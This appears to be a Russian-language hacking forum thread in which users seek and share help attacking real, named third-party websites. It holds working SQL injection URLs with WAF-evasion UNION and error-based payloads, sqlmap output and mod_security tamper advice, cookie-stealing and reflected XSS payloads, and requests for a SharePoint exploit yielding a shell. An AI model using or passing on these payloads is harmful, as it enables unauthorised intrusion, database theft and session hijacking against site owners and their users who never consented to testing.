Vulnerabilities in SharePoint could allow elevation of privilege Есть эксплоит ? и можно как то подключится и получить shell код на системе с этой дыйрой ? Везде пишется тип права повышать, а какой толк только.
Уязвимость найдена через форму поиска, параметр ' подскажите как раскрутить Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 : SELECT COUNT(*) FROM `mstr_manageproduct` AS A INNER JOIN `mstr_products` AS B ON A.`product_id`=B.product_id INNER JOIN `mstr_saller` AS C ON A.`saller_id`=C.saller_id WHERE 1=1 AND A.status='Active' AND B.`product_name` like '%'%'
Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег <img>. Кто подскажет. Или любой другой способ использовать js на сайте forum.minecraft-galaxy.ru
Привет а как большой js засовывать, когда невозможно за тега а выйти? Code: <a href="https://" onmouseover="alert(document.cookie)" target="_blank">finiio</a>
буквально сегодня в соседней теме отвечал человеку с похожим вопросом https://forum.antichat.ru/threads/464058/
Можно подробнее? гугление ничего толком не дает. Есть усечение пути (с кучей /./.) - но это не то, как я понимаю.
Помогите ваф обойти Code: http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?route=product/category&path=64&limit=32 с использованием тампера between возвращает ошибку: [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 1 times. Найденные уязвимости: Parameter: path (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=product/category&path=64 AND 9469=9469&limit=32 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: route=product/category&path=64 AND SLEEP(10)&limit=32 Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?
2 BabaDook Вероятнее всего потому, что в мануалах по дефолту так написано. 2 grelly modsecurityversioned и modsecurityzeroversioned -тамперы под mod_security
Code: path=64 group by elt(rand(0)|0,version()) having avg(0)-- - Duplicate entry '5.6.39-83.1' for key 'group_key Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.
Там и с Union особых проблем нет Code: http://shoebrand.co.uk/index.php?route=product/category&path=64+AND+FALSe+/*!50000UniON*//*!50000SeLeCT*/1,version(),3+--+-&limit=32
Code: http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1 Можно что нить сделать?
Маловероятно. На сайте присутствуют и другие уязвимости,можно попробовать посмотреть что то еще: Code: http://www.quattrobi.it/it/no_cache/prodotti/famiglia/?family[id]=98&marcatura="><script>alert(document.domain)</script>